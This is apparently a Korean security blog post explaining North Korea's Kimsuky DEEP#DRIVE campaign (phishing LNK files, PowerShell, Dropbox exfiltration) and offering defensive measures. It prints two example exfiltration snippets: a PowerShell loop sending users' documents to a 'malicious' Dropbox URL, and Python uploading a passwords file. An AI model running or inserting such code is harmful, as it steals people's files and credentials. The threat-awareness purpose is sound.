안녕하세요!
오늘은 북한 해킹 그룹 ‘Kimsuky’가 PowerShell과 Dropbox를 활용해 남한을 공격하는
새로운 방식에 대해 알아보려고 합니다. 😱
이제는 단순한 해킹이 아니라,
신뢰할 수 있는 플랫폼을 악용해 보안 탐지를 피해가는 수준까지 발전했어요! 😨
📌 TL;DR (한줄 요약)
✅ 북한 해킹 그룹 ‘Kimsuky’, PowerShell과 Dropbox를 이용한 ‘DEEP#DRIVE’ 캠페인 진행
✅ 남한 정부 기관, 기업, 암호화폐 관련 기관 등을 주요 타겟으로 삼아 공격
✅ LNK 파일(바로가기)과 피싱 이메일을 사용해 악성 코드 감염 유도
✅ PowerShell 스크립트로 시스템 정보 탈취 후 Dropbox로 전송
✅ 보안 강화를 위해 PowerShell 사용 제한, 피싱 이메일 주의, 클라우드 모니터링 필수!
1️⃣ Kimsuky 해킹, 어떻게 이루어질까?
💡 Kimsuky는 누구인가요?
✔️ 북한 정찰총국과 연계된 APT(Advanced Persistent Threat) 해킹 그룹
✔️ 주로 한국, 미국, 일본 등 주요 국가를 대상으로 사이버 공격 수행
✔️ 특히 정보 탈취, 스파이 활동, 군사 및 외교 기밀 수집을 주목적으로 함
🔍 이번 공격 특징 (DEEP#DRIVE 캠페인)
Kimsuky는 기존의 해킹 방식에서 벗어나 Dropbox와 PowerShell을 이용하여 보안 탐지를 회피하는 전략을 사용하고 있습니다. 😨
📡 공격 진행 방식:
1️⃣ 피싱 이메일을 전송 → 한글 문서(.HWP), 엑셀(.XLSX), PPT(*.PPTX) 등 포함
2️⃣ 첨부된 ZIP 파일 실행 → 안에 있는 .LNK(바로가기) 파일을 클릭하면 감염 시작
3️⃣ PowerShell 악성 코드 실행 → 사용자 모르게 실행되며 시스템 정보 탈취
4️⃣ 수집한 정보 Dropbox에 전송 → 추가 명령을 받아 공격 지속
🛑 즉, 사용자는 단순히 파일 하나를 열었을 뿐인데, 해킹이 진행되는 것! 😱
2️⃣ 북한 해커들이 활용한 해킹 기술 🔥
🛠️ 1. PowerShell을 활용한 자동화 공격
Kimsuky는 **PowerShell(윈도우 내장 명령어 도구)**을 이용해 악성 코드를 자동 실행합니다.
✔️ 백그라운드에서 실행되어 사용자가 감지하기 어려움
✔️ 시스템 정보를 빼내거나 추가 악성 코드를 다운로드 가능
📌 예제 코드 (PowerShell을 이용한 정보 탈취)
$files = Get-ChildItem -Path "C:\Users\" -Recurse -Include "*.docx","*.xlsx","*.pdf"
foreach ($file in $files) {
Invoke-WebRequest -Uri "https://dropbox.com/malicious" -Method POST -InFile $file.FullName
}
✅ 위 코드를 실행하면 사용자의 문서 파일이 해커의 Dropbox로 전송됨 😨
📂 2. Dropbox를 이용한 데이터 유출
해커들은 Dropbox 같은 신뢰할 수 있는 클라우드 플랫폼을 이용하여 데이터 전송합니다.
✔️ 보안 솔루션에 의해 차단되지 않도록 Dropbox API를 활용
✔️ 해킹이 탐지되면 빠르게 계정을 삭제하고 새로운 계정으로 이동
📌 예제 코드 (Dropbox에 시스템 정보 업로드)
import dropbox
dbx = dropbox.Dropbox("ACCESS_TOKEN")
with open("C:\\Users\\Public\\passwords.txt", "rb") as f:
dbx.files_upload(f.read(), "/stolen_data.txt")
print("[+] Data uploaded successfully!")
✅ 위 코드를 사용하면 시스템에서 탈취한 파일을 Dropbox에 업로드 가능 😱
3️⃣ 주요 타겟 및 피해 규모 📊
✔️ 남한 정부 기관 및 외교 관련 단체
✔️ 금융 기업 및 암호화폐 거래소
✔️ 방위산업 관련 기업 및 연구소
🔍 Securonix 조사에 따르면:
- 8,000개 이상의 시스템 데이터가 Dropbox로 전송된 흔적 발견
- 대량의 민감한 문서가 외부로 유출되었을 가능성 큼
😨 즉, 해커들은 한국의 주요 기관과 기업에서 기밀 정보를 빼내고 있을 가능성이 높음!
4️⃣ 방어 및 대응 방안 🛡️
📢 지금 바로 보안 점검하세요!
🚀 Kimsuky 해킹 공격을 막기 위해 다음 보안 조치를 반드시 수행하세요!
🔹 PowerShell 사용 제한 🔒
✔️ 그룹 정책(GPO)에서 PowerShell 실행 차단
✔️ 필요 시 특정 관리자 계정만 사용하도록 제한
🔹 Dropbox 및 클라우드 서비스 모니터링 👀
✔️ 네트워크에서 Dropbox, Google Drive 등의 비정상적인 데이터 업로드 감지
✔️ DLP(Data Loss Prevention) 솔루션 활용
🔹 피싱 이메일 교육 및 파일 실행 제한 📩
✔️ 의심스러운 이메일과 첨부 파일 실행 주의
✔️ .LNK, .ZIP 파일 차단 정책 적용
🔹 보안 업데이트 및 백신 프로그램 실행 🛡️
✔️ 윈도우 보안 업데이트 최신 상태 유지
✔️ 기업 및 기관에서는 보안 솔루션으로 악성 코드 탐지 활성화
🚀 결론: 해킹을 막으려면 보안 조치가 필수!
💡 Kimsuky의 공격 방식은 점점 정교해지고 있으며, 기존 보안 시스템을 우회하는 기술을 적극 활용 중입니다.
💡 이제는 단순한 이메일 해킹이 아니라, PowerShell과 클라우드를 악용한 고급 해킹 기법이 사용되고 있습니다.
📌 🔴 지금 당장 보안 점검을 수행하고, 시스템 보호를 강화하세요! 🔴
📢 추가적인 보안 관련 질문이나 정보가 필요하면 댓글로 남겨주세요! 😊🚀
'CyberSecurity > Security🔐' 카테고리의 다른 글
🚨 'Darcula' PhaaS: 클릭 한 번으로 피싱 공격, 현실이 되다! 🚨 (0) | 2025.02.23 |
---|---|
🚨 “맥북 사용한다고 안전할 줄 알았어?” XCSSET 해킹 공격, 당신의 Mac도 위험하다! 🚨 (2) | 2025.02.21 |
🚨 PostgreSQL & BeyondTrust 취약점 연계 해킹 위협! 내 데이터는 안전할까? 🔥 (0) | 2025.02.14 |
🛑 사이트에 있는 배너 광고도 해킹될 수 있을까? 🤔 (2) | 2025.02.05 |
국가망 보안체계 가이드라인: 새로운 시대를 위한 보안 패러다임 🛡️ (2) | 2025.01.24 |